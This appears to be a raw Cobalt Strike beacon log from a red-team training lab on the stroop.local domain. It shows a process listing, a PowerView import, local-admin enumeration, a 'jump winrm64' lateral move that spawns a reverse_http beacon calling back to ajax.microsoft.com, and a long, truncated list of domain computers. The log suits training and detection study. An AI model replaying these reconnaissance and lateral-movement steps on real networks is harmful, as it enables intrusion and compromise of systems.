+OfficeClickToRun.exe 700 3084 +svchost.exe 700 3184 +svchost.exe 700 3192 +svchost.exe 700 3200 +svchost.exe 700 3216 +WaAppAgent.exe 700 3264 +sysmon64.exe 700 3280 +svchost.exe 700 3292 +svchost.exe 700 3316 +MsMpEng.exe 700 3324 
+WindowsAzureGuestAgent.exe 700 3336 +WindowsAzureNetAgent.exe 700 3368 +WindowsAzureTelemetryService.exe 700 3428 +svchost.exe 700 3492 +svchost.exe 700 3552 +svchost.exe 700 3688 +VFPlugin.exe 3368 3812 +conhost.exe 3812 3856 +unsecapp.exe 920 1744 +WmiPrvSE.exe 920 3236 +svchost.exe 700 4304 +svchost.exe 700 4352 +svchost.exe 700 4616 +svchost.exe 700 4648 +WmiPrvSE.exe 920 4680 +NisSrv.exe 700 4836 +svchost.exe 700 4884 +svchost.exe 700 4912 +taskhostw.exe 1144 2124 +svchost.exe 700 4016 +svchost.exe 700 5240 +svchost.exe 700 5284 +csrss.exe 5752 5760 +winlogon.exe 5752 5804 +fontdrvhost.exe 5804 5892 +dwm.exe 5804 5940 +svchost.exe 700 6128 +rdpclip.exe 1040 5588 x64 STROOP\w.tax 2 +sihost.exe 1444 808 x64 STROOP\w.tax 2 +svchost.exe 700 5556 x64 STROOP\w.tax 2 +svchost.exe 700 4084 x64 STROOP\w.tax 2 +taskhostw.exe 1144 5008 x64 STROOP\w.tax 2 +svchost.exe 700 5116 +svchost.exe 700 6292 +ctfmon.exe 6292 6348 x64 STROOP\w.tax 2 +svchost.exe 700 6408 +explorer.exe 6420 6500 x64 STROOP\w.tax 2 +svchost.exe 700 6748 x64 STROOP\w.tax 2 +ShellExperienceHost.exe 920 6960 x64 STROOP\w.tax 2 +SearchUI.exe 920 7076 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 7160 x64 STROOP\w.tax 2 +RuntimeBroker.exe 920 6156 x64 STROOP\w.tax 2 +WaSecAgentProv.exe 3264 7512 +conhost.exe 7512 7592 +RuntimeBroker.exe 920 7824 x64 STROOP\w.tax 2 +SearchIndexer.exe 700 7900 +SearchProtocolHost.exe 7900 8040 +SearchFilterHost.exe 7900 8064 +smartscreen.exe 920 8144 x64 STROOP\w.tax 2 +SecurityHealthSystray.exe 6500 6924 x64 STROOP\w.tax 2 +SecurityHealthService.exe 700 5136 +svchost.exe 700 5512 +mousedrivercontrol.exe 6500 5192 x64 STROOP\w.tax 2 +svchost.exe 700 7424 +svchost.exe 700 6940 +svchost.exe 700 892 +POWERPNT.EXE 6500 1508 x86 STROOP\w.tax 2 +svchost.exe 700 2060 +sppsvc.exe 700 3436 +RuntimeBroker.exe 920 4896 x64 STROOP\w.tax 2 +msiexec.exe 700 6644 +svchost.exe 700 6464 +SgrmBroker.exe 700 5296 +svchost.exe 700 6984 +svchost.exe 700 7344 +svchost.exe 700 6524 x64 STROOP\w.tax 2 
+ + +03/30 08:42:55 UTC [input] powershell-import +03/30 08:43:10 UTC [input] powershell-import +03/30 08:43:13 UTC [task] Tasked beacon to import: C:\Users\outflank\Desktop\Training\Lab7 - internal recon\PowerView.ps1 +03/30 08:43:17 UTC [checkin] host called home, sent: 101224 bytes +03/30 08:43:22 UTC [input] powershell Get-NetLocalGroup -computername l-win224 +03/30 08:43:23 UTC [task] Tasked beacon to run: Get-NetLocalGroup -computername l-win224 +03/30 08:43:27 UTC [checkin] host called home, sent: 377 bytes +03/30 08:43:31 UTC [output] +received output: +#< CLIXML + + +ComputerName : l-win224 +AccountName : STROOP/l-win224/bofh +IsDomain : False +IsGroup : False +SID : S-1-5-21-1770739200-3703860189-1291868052-500 +Description : Built-in account for administering the computer/domain +PwdLastSet : 3/29/2020 2:17:31 AM +PwdExpired : False +UserFlags : 66049 +Disabled : False +LastLogin : 3/30/2020 8:40:18 AM + +ComputerName : l-win224 +AccountName : stroop.local/Domain Admins +IsDomain : True +IsGroup : True +SID : S-1-5-21-2163199188-2306780613-1636707950-512 +Description : +Disabled : +LastLogin : +PwdLastSet : +PwdExpired : +UserFlags : + +ComputerName : l-win224 +AccountName : stroop.local/Domain Users +IsDomain : True +IsGroup : True +SID : S-1-5-21-2163199188-2306780613-1636707950-513 +Description : +Disabled : +LastLogin : +PwdLastSet : +PwdExpired : +UserFlags : + + + +System.Management.Automation.PSCustomObjectSystem.Object1Preparing modules for first use.0-1-1Completed-1 + +03/30 08:44:06 UTC [input] jump winrm64 L-WIN224 DFApache +03/30 08:44:06 UTC [task] Tasked beacon to run windows/beacon_http/reverse_http (ajax.microsoft.com:80) on L-WIN224 via WinRM +03/30 08:44:09 UTC [checkin] host called home, sent: 226917 bytes +03/30 08:44:19 UTC [output] +received output: +#< CLIXML + + +03/30 08:46:51 UTC [input] net computers stroop.local +03/30 08:46:51 UTC [task] Tasked beacon to run net computers on stroop.local +03/30 08:46:52 UTC [checkin] host 
called home, sent: 104509 bytes +03/30 08:46:53 UTC [output] +received output: +Computers in domain 'stroop.local': + + Server Name IP Address + ----------- ---------- + S-WIN21 10.1.2.10 + S-WIN22 10.2.1.10 + s-win100 unknown + s-win101 unknown + s-win102 unknown + s-win103 unknown + s-win104 unknown + s-win105 unknown + s-win106 unknown + s-win107 unknown + s-win108 unknown + s-win109 unknown + s-win110 unknown + s-win111 unknown + s-win112 unknown + s-win113 unknown + s-win114 unknown + s-win115 unknown + s-win116 unknown + s-win117 unknown + s-win118 unknown + s-win119 unknown + s-win120 unknown + s-win121 unknown + s-win122 unknown + s-win123 unknown + s-win124 unknown + s-win125 unknown + s-win126 unknown + s-win127 unknown + s-win128 unknown + s-win129 unknown + s-win130 unknown + s-win131 unknown + s-win132 unknown + s-win133 unknown + s-win134 unknown + s-win135 unknown + s-win136 unknown + s-win137 unknown + s-win138 unknown + s-win139 unknown + s-win140 unknown + s-win141 unknown + s-win142 unknown + s-win143 unknown + s-win144 unknown + s-win145 unknown + l-win1000 unknown + l-win1001 unknown + l-win1002 unknown + l-win1003 unknown + l-win1004 unknown + l-win1005 unknown + l-win1006 unknown + l-win1007 unknown + l-win1008 unknown + l-win1009 unknown + l-win1010 unknown + l-win1011 unknown + l-win1012 unknown + l-win1013 unknown + l-win1014 unknown + l-win1015 unknown + l-win1016 unknown + l-win1017 unknown + l-win1018 unknown + l-win1019 unknown + l-win1020 unknown + l-win1021 unknown + l-win1022 unknown + l-win1023 unknown + l-win1024 unknown + l-win1025 unknown + l-win1026 unknown + l-win1027 unknown + l-win1028 unknown + l-win1029 unknown + l-win1030 unknown + l-win1031 unknown + l-win1032 unknown + l-win1033 unknown + l-win1034 unknown + l-win1035 unknown + l-win1036 unknown + l-win1037 unknown + l-win1038 unknown + l-win1039 unknown + l-win1040 unknown + l-win1041 unknown + l-win1042 unknown + l-win1043 unknown + l-win1044 unknown + l-win1045 
unknown + l-win1046 unknown + l-win1047 unknown + l-win1048 unknown + l-win1049 unknown + l-win1050 unknown + l-win1051 unknown + l-win1052 unknown + l-win1053 unknown + l-win1054 unknown + l-win1055 unknown + l-win1056 unknown + l-win1057 unknown + l-win1058 unknown + l-win1059 unknown + l-win1060 unknown + l-win1061 unknown + l-win1062 unknown + l-win1063 unknown + l-win1064 unknown + l-win1065 unknown + l-win1066 unknown + l-win1067 unknown + l-win1068 unknown + l-win1069 unknown + l-win1070 unknown + l-win1071 unknown + l-win1072 unknown + l-win1073 unknown + l-win1074 unknown + l-win1075 unknown + l-win1076 unknown + l-win1077 unknown + l-win1078 unknown + l-win1079 unknown + l-win1080 unknown + l-win1081 unknown + l-win1082 unknown + l-win1083 unknown + l-win1084 unknown + l-win1085 unknown + l-win1086 unknown + l-win1087 unknown + l-win1088 unknown + l-win1089 unknown + l-win1090 unknown + l-win1091 unknown + l-win1092 unknown + l-win1093 unknown + l-win1094 unknown + l-win1095 unknown + l-win1096 unknown + l-win1097 unknown + l-win1098 unknown + l-win1099 unknown + l-win1100 unknown + l-win1101 unknown + l-win1102 unknown + l-win1103 unknown + l-win1104 unknown + l-win1105 unknown + l-win1106 unknown + l-win1107 unknown + l-win1108 unknown + l-win1109 unknown + l-win1110 unknown + l-win1111 unknown + l-win1112 unknown + l-win1113 unknown + l-win1114 unknown + l-win1115 unknown + l-win1116 unknown + l-win1117 unknown + l-win1118 unknown + l-win1119 unknown + l-win1120 unknown + l-win1121 unknown + l-win1122 unknown + l-win1123 unknown + l-win1124 unknown + l-win1125 unknown + l-win1126 unknown + l-win1127 unknown + l-win1128 unknown + l-win1129 unknown + l-win1130 unknown + l-win1131 unknown + l-win1132 unknown + l-win1133 unknown + l-win1134 unknown + l-win1135 unknown + l-win1136 unknown + l-win1137 unknown + l-win1138 unknown + l-win1139 unknown + l-win1140 unknown + l-win1141 unknown + l-win1142 unknown + l-win1143 unknown + l-win1144 unknown + l-win1145 
unknown + l-win1146 unknown + l-win1147 unknown + l-win1148 unknown + l-win1149 unknown + l-win1150 unknown + l-win1151 unknown + l-win1152 unknown + l-win1153 unknown + l-win1154 unknown + l-win1155 unknown + l-win1156 unknown + l-win1157 unknown + l-win1158 unknown + l-win1159 unknown + l-win1160 unknown + l-win1161 unknown + l-win1162 unknown + l-win1163 unknown + l-win1164 unknown + l-win1165 unknown + l-win1166 unknown + l-win1167 unknown + l-win1168 unknown + l-win1169 unknown + l-win1170 unknown + l-win1171 unknown + l-win1172 unknown + l-win1173 unknown + l-win1174 unknown + l-win1175 unknown + l-win1176 unknown + l-win1177 unknown + l-win1178 unknown + l-win1179 unknown + l-win1180 unknown + l-win1181 unknown + l-win1182 unknown + l-win1183 unknown + l-win1184 unknown + l-win1185 unknown + l-win1186 unknown + l-win1187 unknown + l-win1188 unknown + l-win1189 unknown + l-win1190 unknown + l-win1191 unknown + l-win1192 unknown + l-win1193 unknown + l-win1194 unknown + l-win1195 unknown + l-win1196 unknown + l-win1197 unknown + l-win1198 unknown + l-win1199 unknown + l-win1200 unknown + l-win1201 unknown + l-win1202 unknown + l-win1203 unknown + l-win1204 unknown + l-win1205 unknown + l-win1206 unknown + l-win1207 unknown + l-win1208 unknown + l-win1209 unknown + l-win1210 unknown + l-win1211 unknown + l-win1212 unknown + l-win1213 unknown + l-win1214 unknown + l-win1215 unknown + l-win1216 unknown + l-win1217 unknown + l-win1218 unknown + l-win1219 unknown + l-win1220 unknown + l-win1221 unknown + l-win1222 unknown + l-win1223 unknown + l-win1224 unknown + l-win1225 unknown + l-win1226 unknown + l-win1227 unknown + l-win1228 unknown + l-win1229 unknown + l-win1230 unknown + l-win1231 unknown + l-win1232 unknown + l-win1233 unknown + l-win1234 unknown + l-win1235 unknown + l-win1236 unknown + l-win1237 unknown + l-win1238 unknown + l-win1239 unknown + l-win1240 unknown + l-win1241 unknown + l-win1242 unknown + l-win1243 unknown + l-win1244 unknown + l-win1245 
unknown + l-win1246 unknown + l-win1247 unknown + l-win1248 unknown + l-win1249 unknown + l-win1250 unknown + l-win1251 unknown + l-win1252 unknown + l-win1253 unknown + l-win1254 unknown + l-win1255 unknown + l-win1256 unknown + l-win1257 unknown + l-win1258 unknown + l-win1259 unknown + l-win1260 unknown + l-win1261 unknown + l-win1262 unknown + l-win1263 unknown + l-win1264 unknown + l-win1265 unknown + l-win1266 unknown + l-win1267 unknown + l-win1268 unknown + l-win1269 unknown + l-win1270 unknown + l-win1271 unknown + l-win1272 unknown + l-win1273 unknown + l-win1274 unknown + l-win1275 unknown + l-win1276 unknown + l-win1277 unknown + l-win1278 unknown + l-win1279 unknown + l-win1280 unknown + l-win1281 unknown + l-win1282 unknown + l-win1283 unknown + l-win1284 unknown + l-win1285 unknown + l-win1286 unknown + l-win1287 unknown + l-win1288 unknown + l-win1289 unknown + l-win1290 unknown + l-win1291 unknown + l-win1292 unknown + l-win1293 unknown + l-win1294 unknown + l-win1295 unknown + l-win1296 unknown + l-win1297 unknown + l-win1298 unknown + l-win1299 unknown + l-win1300 unknown + l-win1301 unknown + l-win1302 unknown + l-win1303 unknown + l-win1304 unknown + l-win1305 unknown + l-win1306 unknown + l-win1307 unknown + l-win1308 unknown + l-win1309 unknown + l-win1310 unknown + l-win1311 unknown + l-win1312 unknown + l-win1313 unknown + l-win1314 unknown + l-win1315 unknown + l-win1316 unknown + l-win1317 unknown + l-win1318 unknown + l-win1319 unknown + l-win1320 unknown + l-win1321 unknown + l-win1322 unknown + l-win1323 unknown + l-win1324 unknown + l-win1325 unknown + l-win1326 unknown + l-win1327 unknown + l-win1328 unknown + l-win1329 unknown + l-win1330 unknown + l-win1331 unknown + l-win1332 unknown + l-win1333 unknown + l-win1334 unknown + l-win1335 unknown + l-win1336 unknown + l-win1337 unknown + l-win1338 unknown + l-win1339 unknown + l-win1340 unknown + l-win1341 unknown + l-win1342 unknown + l-win1343 unknown + l-win1344 unknown + l-win1345 
unknown + l-win1346 unknown + l-win1347 unknown + l-win1348 unknown + l-win1349 unknown + l-win1350 unknown + l-win1351 unknown + l-win1352 unknown + l-win1353 unknown + l-win1354 unknown + l-win1355 unknown + l-win1356 unknown + l-win1357 unknown + l-win1358 unknown + l-win1359 unknown + l-win1360 unknown + l-win1361 unknown + l-win1362 unknown + l-win1363 unknown + l-win1364 unknown + l-win1365 unknown + l-win1366 unknown + l-win1367 unknown + l-win1368 unknown + l-win1369 unknown + l-win1370 unknown + l-win1371 unknown + l-win1372 unknown + l-win1373 unknown + l-win1374 unknown + l-win1375 unknown + l-win1376 unknown + l-win1377 unknown + l-win1378 unknown + l-win1379 unknown + l-win1380 unknown + l-win1381 unknown + l-win1382 unknown + l-win1383 unknown + l-win1384 unknown + l-win1385 unknown + l-win1386 unknown + l-win1387 unknown + l-win1388 unknown + l-win1389 unknown + l-win1390 unknown + l-win1391 unknown + l-win1392 unknown + l-win1393 unknown + l-win1394 unknown + l-win1395 unknown + l-win1396 unknown + l-win1397 unknown + l-win1398 unknown + l-win1399 unknown + l-win1400 unknown + + +03/30 08:46:58 UTC [output] +received output: + l-win1401 unknown + l-win1402 unknown + l-win1403 unknown + l-win1404 unknown + l-win1405 unknown + l-win1406 unknown + l-win1407 unknown + l-win1408 unknown + l-win1409 unknown + l-win1410 unknown + l-win1411 unknown + l-win1412 unknown + l-win1413 unknown + l-win1414 unknown + l-win1415 unknown + l-win1416 unknown + l-win1417 unknown + l-win1418 unknown + l-win1419 unknown + l-win1420 unknown + l-win1421 unknown + l-win1422 unknown + l-win1423 unknown + l-win1424 unknown + l-win1425 unknown + l-win1426 unknown + l-win1427 unknown + l-win1428 unknown + l-win1429 unknown + l-win1430 unknown + l-win1431 unknown + l-win1432 unknown + l-win1433 unknown + l-win1434 unknown + l-win1435 unknown + l-win1436 unknown + l-win1437 unknown + l-win1438 unknown + l-win1439 unknown + l-win1440 unknown + l-win1441 unknown + l-win1442 unknown 
+ l-win1443 unknown + l-win1444 unknown + l-win1445 unknown + l-win1446 unknown + l-win1447 unknown + l-win1448 unknown + l-win1449 unknown + l-win1450 unknown + l-win1451 unknown + l-win1452 unknown + l-win1453 unknown + l-win1454 unknown + l-win1455 unknown + l-win1456 unknown + l-win1457 unknown + l-win1458 unknown + l-win1459 unknown + l-win1460 unknown + l-win1461 unknown + l-win1462 unknown + l-win1463 unknown + l-win1464 unknown + l-win1465 unknown + l-win1466 unknown + l-win1467 unknown + l-win1468 unknown + l-win1469 unknown + l-win1470 unknown + l-win1471 unknown + l-win1472 unknown + l-win1473 unknown + l-win1474 unknown + l-win1475 unknown + l-win1476 unknown + l-win1477 unknown + l-win1478 unknown + l-win1479 unknown + l-win1480 unknown + l-win1481 unknown + l-win1482 unknown + l-win1483 unknown + l-win1484 unknown + l-win1485 unknown + l-win1486 unknown + l-win1487 unknown + l-win1488 unknown + l-win1489 unknown + l-win1490 unknown + l-win1491 unknown + l-win1492 unknown + l-win1493 unknown + l-win1494 unknown + l-win1495 unknown + l-win1496 unknown + l-win1497 unknown + l-win1498 unknown + l-win1499 unknown + l-win1500 unknown + l-win1501 unknown + l-win1502 unknown + l-win1503 unknown + l-win1504 unknown + l-win1505 unknown + l-win1506 unknown + l-win1507 unknown + l-win1508 unknown + l-win1509 unknown + l-win1510 unknown + l-win1511 unknown + l-win1512 unknown + l-win1513 unknown + l-win1514 unknown + l-win1515 unknown + l-win1516 unknown + l-win1517 unknown + l-win1518 unknown + l-win1519 unknown + l-win1520 unknown + l-win1521 unknown + l-win1522 unknown + l-win1523 unknown + l-win1524 unknown + l-win1525 unknown + l-win1526 unknown + l-win1527 unknown + l-win1528 unknown + l-win1529 unknown + l-win1530 unknown + l-win1531 unknown + l-win1532 unknown + l-win1533 unknown + l-win1534 unknown + l-win1535 unknown + l-win1536 unknown + l-win1537 unknown + l-win1538 unknown + l-win1539 unknown + l-win1540 unknown + l-win1541 unknown + l-win1542 unknown 
+ l-win1543 unknown + l-win1544 unknown + l-win1545 unknown + l-win1546 unknown + l-win1547 unknown + l-win1548 unknown + l-win1549 unknown + l-win1550 unknown + l-win1551 unknown + l-win1552 unknown + l-win1553 unknown + l-win1554 unknown + l-win1555 unknown + l-win1556 unknown + l-win1557 unknown + l-win1558 unknown + l-win1559 unknown + l-win1560 unknown + l-win1561 unknown + l-win1562 unknown + l-win1563 unknown + l-win1564 unknown + l-win1565 unknown + l-win1566 unknown + l-win1567 unknown + l-win1568 unknown + l-win1569 unknown + l-win1570 unknown + l-win1571 unknown + l-win1572 unknown + l-win1573 unknown + l-win1574 unknown + l-win1575 unknown + l-win1576 unknown + l-win1577 unknown + l-win1578 unknown + l-win1579 unknown + l-win1580 unknown + l-win1581 unknown + l-win1582 unknown + l-win1583 unknown + l-win1584 unknown + l-win1585 unknown + l-win1586 unknown + l-win1587 unknown + l-win1588 unknown + l-win1589 unknown + l-win1590 unknown + l-win1591 unknown + l-win1592 unknown + l-win1593 unknown + l-win1594 unknown + l-win1595 unknown + l-win1596 unknown + l-win1597 unknown + l-win1598 unknown + l-win1599 unknown + l-win1600 unknown + l-win1601 unknown + l-win1602 unknown + l-win1603 unknown + l-win1604 unknown + l-win1605 unknown + l-win1606 unknown + l-win1607 unknown + l-win1608 unknown + l-win1609 unknown + l-win1610 unknown + l-win1611 unknown + l-win1612 unknown + l-win1613 unknown + l-win1614 unknown + l-win1615 unknown + l-win1616 unknown + l-win1617 unknown + l-win1618 unknown + l-win1619 unknown + l-win1620 unknown + l-win1621 unknown + l-win1622 unknown + l-win1623 unknown + l-win1624 unknown + l-win1625 unknown + l-win1626 unknown + l-win1627 unknown + l-win1628 unknown + l-win1629 unknown + l-win1630 unknown + l-win1631 unknown + l-win1632 unknown + l-win1633 unknown + l-win1634 unknown + l-win1635 unknown + l-win1636 unknown + l-win1637 unknown + l-win1638 unknown + l-win1639 unknown + l-win1640 unknown + l-win1641 unknown + l-win1642 unknown 
+ l-win1643 unknown + l-win1644 unknown + l-win1645 unknown + l-win1646 unknown + l-win1647 unknown + l-win1648 unknown + l-win1649 unknown + l-win1650 unknown + l-win1651 unknown + l-win1652 unknown + l-win1653 unknown + l-win1654 unknown + l-win1655 unknown + l-win1656 unknown + l-win1657 unknown + l-win1658 unknown + l-win1659 unknown + l-win1660 unknown + l-win1661 unknown + l-win1662 unknown + l-win1663 unknown + l-win1664 unknown + l-win1665 unknown + l-win1666 unknown + l-win1667 unknown + l-win1668 unknown + l-win1669 unknown + l-win1670 unknown + l-win1671 unknown + l-win1672 unknown + l-win1673 unknown + l-win1674 unknown + l-win1675 unknown + l-win1676 unknown + l-win1677 unknown + l-win1678 unknown + l-win1679 unknown + l-win1680 unknown + l-win1681 unknown + l-win1682 unknown + l-win1683 unknown + l-win1684 unknown + l-win1685 unknown + l-win1686 unknown + l-win1687 unknown + l-win1688 unknown + l-win1689 unknown + l-win1690 unknown + l-win1691 unknown + l-win1692 unknown + l-win1693 unknown + l-win1694 unknown + l-win1695 unknown + l-win1696 unknown + l-win1697 unknown + l-win1698 unknown + l-win1699 unknown + l-win1700 unknown + l-win1701 unknown + l-win1702 unknown + l-win1703 unknown + l-win1704 unknown + l-win1705 unknown + l-win1706 unknown + l-win1707 unknown + l-win1708 unknown + l-win1709 unknown + l-win1710 unknown + l-win1711 unknown + l-win1712 unknown + l-win1713 unknown + l-win1714 unknown + l-win1715 unknown + l-win1716 unknown + l-win1717 unknown + l-win1718 unknown + l-win1719 unknown + l-win1720 unknown + l-win1721 unknown + l-win1722 unknown + l-win1723 unknown + l-win1724 unknown + l-win1725 unknown + l-win1726 unknown + l-win1727 unknown + l-win1728 unknown + l-win1729 unknown + l-win1730 unknown + l-win1731 unknown + l-win1732 unknown + l-win1733 unknown + l-win1734 unknown + l-win1735 unknown + l-win1736 unknown + l-win1737 unknown + l-win1738 unknown + l-win1739 unknown + l-win1740 unknown + l-win1741 unknown + l-win1742 unknown 
+ l-win1743 unknown + l-win1744 unknown + l-win1745 unknown + l-win1746 unknown + l-win1747 unknown + l-win1748 unknown + l-win1749 unknown + l-win1750 unknown + l-win1751 unknown + l-win1752 unknown + l-win1753 unknown + l-win1754 unknown + l-win1755 unknown + l-win1756 unknown + l-win1757 unknown + l-win1758 unknown + l-win1759 unknown + l-win1760 unknown + l-win1761 unknown + l-win1762 unknown + l-win1763 unknown + l-win1764 unknown + l-win1765 unknown + l-win1766 unknown + l-win1767 unknown + l-win1768 unknown + l-win1769 unknown + l-win1770 unknown + l-win1771 unknown + l-win1772 unknown + l-win1773 unknown + l-win1774 unknown + l-win1775 unknown + l-win1776 unknown + l-win1777 unknown + l-win1778 unknown + l-win1779 unknown + l-win1780 unknown + l-win1781 unknown + l-win1782 unknown + l-win1783 unknown + l-win1784 unknown + l-win1785 unknown + l-win1786 unknown + l-win1787 unknown + l-win1788 unknown + l-win1789 unknown + l-win1790 unknown + l-win1791 unknown + l-win1792 unknown + l-win1793 unknown + l-win1794 unknown + l-win1795 unknown + l-win1796 unknown + l-win1797 unknown + l-win1798 unknown + l-win1799 unknown + l-win1800 unknown + l-win1801 unknown + l-win1802 unknown + l-win1803 unknown + l-win1804 unknown + l-win1805 unknown + l-win1806 unknown + l-win1807 unknown + l-win1808 unknown + l-win1809 unknown + l-win1810 unknown + l-win1811 unknown + l-win1812 unknown + l-win1813 unknown + l-win1814 unknown + l-win1815 unknown + l-win1816 unknown + l-win1817 unknown + l-win1818 unknown + l-win1819 unknown + l-win1820 unknown + l-win1821 unknown + l-win1822 unknown + l-win1823 unknown + l-win1824 unknown + l-win1825 unknown + l-win1826 unknown + l-win1827 unknown + l-win1828 unknown + l-win1829 unknown + l-win1830 unknown + l-win1831 unknown + l-win1832 unknown + l-win1833 unknown + l-win1834 unknown + l-win1835 unknown + l-win1836 unknown + l-win1837 unknown + l-win1838 unknown + l-win1839 unknown + l-win1840 unknown + l-win1841 unknown + l-win1842 unknown 
+ l-win1843 unknown + l-win1844 unknown + l-win1845 unknown + l-win1846 unknown + l-win1847 unknown + l-win1848 unknown + l-win1849 unknown + l-win1850 unknown + l-win1851 unknown + l-win1852 unknown + l-win1853 unknown + l-win1854 unknown + l-win1855 unknown + l-win1856 unknown + l-win1857 unknown + l-win1858 unknown + l-win1859 unknown + l-win1860 unknown + l-win1861 unknown + l-win1862 unknown + l-win1863 unknown + l-win1864 unknown + l-win1865 unknown + l-win1866 unknown + l-win1867 unknown + l-win1868 unknown + l-win1869 unknown + l-win1870 unknown + l-win1871 unknown + l-win1872 unknown + l-win1873 unknown + l-win1874 unknown + l-win1875 unknown + l-win1876 unknown + l-win1877 unknown + l-win1878 unknown + + +03/30 08:47:03 UTC [output] +received output: + l-win1879 unknown + l-win1880 unknown + l-win1881 unknown + l-win1882 unknown + l-win1883 unknown + l-win1884 unknown + l-win1885 unknown + l-win1886 unknown + l-win1887 unknown + l-win1888 unknown + l-win1889 unknown + l-win1890 unknown + l-win1891 unknown + l-win1892 unknown + l-win1893 unknown + l-win1894 unknown + l-win1895 unknown + l-win1896 unknown + l-win1897 unknown + l-win1898 unknown + l-win1899 unknown + l-win1900 unknown + l-win1901 unknown + l-win1902 unknown + l-win1903 unknown + l-win1904 unknown + l-win1905 unknown + l-win1906 unknown + l-win1907 unknown + l-win1908 unknown + l-win1909 unknown + l-win1910 unknown + l-win1911 unknown + l-win1912 unknown + l-win1913 unknown + l-win1914 unknown + l-win1915 unknown + l-win1916 unknown + l-win1917 unknown + l-win1918 unknown + l-win1919 unknown + l-win1920 unknown + l-win1921 unknown + l-win1922 unknown + l-win1923 unknown + l-win1924 unknown + l-win1925 unknown + l-win1926 unknown + l-win1927 unknown + l-win1928 unknown + l-win1929 unknown + l-win1930 unknown + l-win1931 unknown + l-win1932 unknown + l-win1933 unknown + l-win1934 unknown + l-win1935 unknown + l-win1936 unknown + l-win1937 unknown + l-win1938 unknown + l-win1939 unknown + 
l-win1940 unknown + l-win1941 unknown + l-win1942 unknown + l-win1943 unknown + l-win1944 unknown + l-win1945 unknown + l-win1946 unknown + l-win1947 unknown + l-win1948 unknown + l-win1949 unknown + l-win1950 unknown + l-win1951 unknown + l-win1952 unknown + l-win1953 unknown + l-win1954 unknown + l-win1955 unknown + l-win1956 unknown + l-win1957 unknown + l-win1958 unknown + l-win1959 unknown + l-win1960 unknown + l-win1961 unknown + l-win1962 unknown + l-win1963 unknown + l-win1964 unknown + l-win1965 unknown + l-win1966 unknown + l-win1967 unknown + l-win1968 unknown + l-win1969 unknown + l-win1970 unknown + l-win1971 unknown + l-win1972 unknown + l-win1973 unknown + l-win1974 unknown + l-win1975 unknown + l-win1976 unknown + l-win1977 unknown + l-win1978 unknown + l-win1979 unknown + l-win1980 unknown + l-win1981 unknown + l-win1982 unknown + l-win1983 unknown + l-win1984 unknown + l-win1985 unknown + l-win1986 unknown + l-win1987 unknown + l-win1988 unknown + l-win1989 unknown + l-win1990 unknown + l-win1991 unknown + l-win1992 unknown + l-win1993 unknown + l-win1994 unknown + l-win1995 unknown + l-win1996 unknown + l-win1997 unknown + l-win1998 unknown + l-win1999 unknown + l-win2000 unknown + l-win2001 unknown + l-win2002 unknown + l-win2003 unknown + l-win2004 unknown + l-win2005 unknown + l-win2006 unknown + l-win2007 unknown + l-win2008 unknown + l-win2009 unknown + l-win2010 unknown + l-win2011 unknown + l-win2012 unknown + l-win2013 unknown + l-win2014 unknown + l-win2015 unknown + l-win2016 unknown + l-win2017 unknown + l-win2018 unknown + l-win2019 unknown + l-win2020 unknown + l-win2021 unknown + l-win2022 unknown + l-win2023 unknown + l-win2024 unknown + l-win2025 unknown + l-win2026 unknown + l-win2027 unknown + l-win2028 unknown + l-win2029 unknown + l-win2030 unknown + l-win2031 unknown + l-win2032 unknown + l-win2033 unknown + l-win2034 unknown + l-win2035 unknown + l-win2036 unknown + l-win2037 unknown + l-win2038 unknown + l-win2039 unknown + 
l-win2040 unknown + l-win2041 unknown + l-win2042 unknown + l-win2043 unknown + l-win2044 unknown + l-win2045 unknown + l-win2046 unknown + l-win2047 unknown + l-win2048 unknown + l-win2049 unknown + l-win2050 unknown + l-win2051 unknown + l-win2052 unknown + l-win2053 unknown + l-win2054 unknown + l-win2055 unknown + l-win2056 unknown + l-win2057 unknown + l-win2058 unknown + l-win2059 unknown + l-win2060 unknown + l-win2061 unknown + l-win2062 unknown + l-win2063 unknown + l-win2064 unknown + l-win2065 unknown + l-win2066 unknown + l-win2067 unknown + l-win2068 unknown + l-win2069 unknown + l-win2070 unknown + l-win2071 unknown + l-win2072 unknown + l-win2073 unknown + l-win2074 unknown + l-win2075 unknown + l-win2076 unknown + l-win2077 unknown + l-win2078 unknown + l-win2079 unknown + l-win2080 unknown + l-win2081 unknown + l-win2082 unknown + l-win2083 unknown + l-win2084 unknown + l-win2085 unknown + l-win2086 unknown + l-win2087 unknown + l-win2088 unknown + l-win2089 unknown + l-win2090 unknown + l-win2091 unknown + l-win2092 unknown + l-win2093 unknown + l-win2094 unknown + l-win2095 unknown + l-win2096 unknown + l-win2097 unknown + l-win2098 unknown + l-win2099 unknown + l-win2100 unknown + l-win2101 unknown + l-win2102 unknown + l-win2103 unknown + l-win2104 unknown + l-win2105 unknown + l-win2106 unknown + l-win2107 unknown + l-win2108 unknown + l-win2109 unknown + l-win2110 unknown + l-win2111 unknown + l-win2112 unknown + l-win2113 unknown + l-win2114 unknown + l-win2115 unknown + l-win2116 unknown + l-win2117 unknown + l-win2118 unknown + l-win2119 unknown + l-win2120 unknown + l-win2121 unknown + l-win2122 unknown + l-win2123 unknown + l-win2124 unknown + l-win2125 unknown + l-win2126 unknown + l-win2127 unknown + l-win2128 unknown + l-win2129 unknown + l-win2130 unknown + l-win2131 unknown + l-win2132 unknown + l-win2133 unknown + l-win2134 unknown + l-win2135 unknown + l-win2136 unknown + l-win2137 unknown + l-win2138 unknown + l-win2139 unknown + 
l-win2140 unknown + l-win2141 unknown + l-win2142 unknown + l-win2143 unknown + l-win2144 unknown + l-win2145 unknown + l-win2146 unknown + l-win2147 unknown + l-win2148 unknown + l-win2149 unknown + l-win2150 unknown + l-win2151 unknown + l-win2152 unknown + l-win2153 unknown + l-win2154 unknown + l-win2155 unknown + l-win2156 unknown + l-win2157 unknown + l-win2158 unknown + l-win2159 unknown + l-win2160 unknown + l-win2161 unknown + l-win2162 unknown + l-win2163 unknown + l-win2164 unknown + l-win2165 unknown + l-win2166 unknown + l-win2167 unknown + l-win2168 unknown + l-win2169 unknown + l-win2170 unknown + l-win2171 unknown + l-win2172 unknown + l-win2173 unknown + l-win2174 unknown + l-win2175 unknown + l-win2176 unknown + l-win2177 unknown + l-win2178 unknown + l-win2179 unknown + l-win2180 unknown + l-win2181 unknown + l-win2182 unknown + l-win2183 unknown + l-win2184 unknown + l-win2185 unknown + l-win2186 unknown + l-win2187 unknown + l-win2188 unknown + l-win2189 unknown + l-win2190 unknown + l-win2191 unknown + l-win2192 unknown + l-win2193 unknown + l-win2194 unknown + l-win2195 unknown + l-win2196 unknown + 